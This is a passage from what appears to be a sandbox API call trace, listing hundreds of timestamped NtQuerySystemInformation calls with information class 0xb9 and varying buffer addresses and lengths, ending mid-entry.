NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x28, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x20, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0281.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0281.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0281.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0281.901] NtQuerySystemInformation 